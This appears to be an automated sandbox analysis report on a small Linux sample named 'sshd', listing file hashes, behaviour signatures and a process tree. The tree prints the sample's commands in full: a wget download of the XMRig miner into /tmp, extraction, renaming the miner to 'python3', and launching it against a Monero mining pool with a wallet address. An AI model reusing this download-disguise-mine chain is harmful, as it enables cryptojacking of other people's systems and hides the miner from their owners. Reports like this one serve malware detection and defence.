Analysis
-
max time kernel
18s -
max time network
23s -
platform
ubuntu-20.04_amd64 -
resource
ubuntu2004-amd64-20240729-en -
resource tags
arch:amd64arch:i386image:ubuntu2004-amd64-20240729-enkernel:5.4.0-169-genericlocale:en-usos:ubuntu-20.04-amd64system -
submitted
20-01-2025 17:38
Static task
static1
Behavioral task
behavioral1
Sample
sshd
Resource
ubuntu1804-amd64-20240508-en
ubuntu-18.04-amd64
2 signatures
900 seconds
Behavioral task
behavioral2
Sample
sshd
Resource
ubuntu2004-amd64-20240729-en
ubuntu-20.04-amd64
2 signatures
900 seconds
Behavioral task
behavioral3
Sample
sshd
Resource
ubuntu2204-amd64-20240611-en
ubuntu-22.04-amd64
11 signatures
900 seconds
Behavioral task
behavioral4
Sample
sshd
Resource
ubuntu2404-amd64-20240729-en
ubuntu-24.04-amd64
11 signatures
900 seconds
General
-
Target
sshd
-
Size
496B
-
MD5
bde8eb67612ae4246e358fc8a75e4f04
-
SHA1
d1e03cf4130281b525f8a5d51abc3c3917c58d58
-
SHA256
986b11952fe8b5764c39bc39ab3656b4f3b14c331cf32cfea6d8b0079c81e5f3
-
SHA512
ac62ad5f3628caef1f68a4ead799e234cb440c321a51ea589e442ceee6b24ce3f56b4c958e770abb4b7ddfbed8c731cd801b58f3ce68011b53c3b8c46688eb28
Score
3/10
Malware Config
Signatures
-
description ioc Process File opened for reading /proc/filesystems tar File opened for reading /proc/filesystems mv File opened for reading /proc/filesystems mv -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/sshd.tgz wget
Processes
-
/tmp/sshd/tmp/sshd1⤵PID:1395
-
/usr/bin/wgetwget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz -O sshd.tgz2⤵
- Writes file to tmp directory
PID:1396
-
-
/usr/bin/tartar -xf sshd.tgz2⤵
- Reads runtime system information
PID:1436 -
/usr/local/sbin/gzipgzip -d3⤵PID:1437
-
-
/usr/local/bin/gzipgzip -d3⤵PID:1437
-
-
/usr/sbin/gzipgzip -d3⤵PID:1437
-
-
/usr/bin/gzipgzip -d3⤵PID:1437
-
-
-
/usr/bin/rmrm sshd.tgz -fr2⤵PID:1438
-
-
/usr/bin/mvmv xmrig-6.22.2 sshd_common2⤵
- Reads runtime system information
PID:1439
-
-
/usr/bin/mvmv xmrig python32⤵
- Reads runtime system information
PID:1440
-
-
/tmp/python3./python3 -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:47zqPD9abK85U1mLET6U3ZPAUGEWg45fiGSacihNC2kP2SQvsbqTdwY5QgRpssfSfHhHP4JhPRZ8KZPuLq4jwqSMEZtsN4q.linux3108 -p crypter2⤵PID:1442
-